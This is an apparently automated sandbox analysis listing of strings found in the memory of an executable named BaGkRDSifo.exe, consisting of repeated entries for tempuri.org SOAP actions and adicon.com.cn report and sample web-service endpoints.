            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadReportByBarCodeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadReportByBarcodeNoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadReportByPersonIDAndClientNoAndSickTypeNoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadReportByPersonIDT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadReportByReportFormIDT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadReportFormIDListByBarcodeNoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadReportT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/GetReportFormColumnT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/GetReportUriT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/HelloWorldT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/QueryReport_PKIT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/QueryReportsCountT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RefuseDownloadBarCodeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/T
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/UpLoadReportFromBytesNewT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/UpLoadReportFromBytesT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/UpLoadReportFromBytes_ImageListT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/UpLoadReportFromStrT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/UpLoadRequestFormClientT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/UpgradeRequestFormT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/addInspectReqNoXmlT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/addInspectReqT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/getPatResultNoXmlT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/getPatResultT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/retrieveDocumentViewInfoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/rm_RegionTransT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/rm_Region_FeedbackT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/AppBarcodeStateT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/AppInfoDownT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/AppItemDownT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/AppTrackDownT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/AppUpLoadDeleteT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/AppUpLoadXmlT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/AppUpdateInfoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/DeleteGPGFileT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/DetailListT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/ExistsByYYtmT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/ExistsReportByYYtmT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/ExistsReportOtherT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/ExistsReportT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetAMHItemListT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetAllSampleListT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetAllSampleList_MeiNianT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicByKeyIdT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicByYYTMT
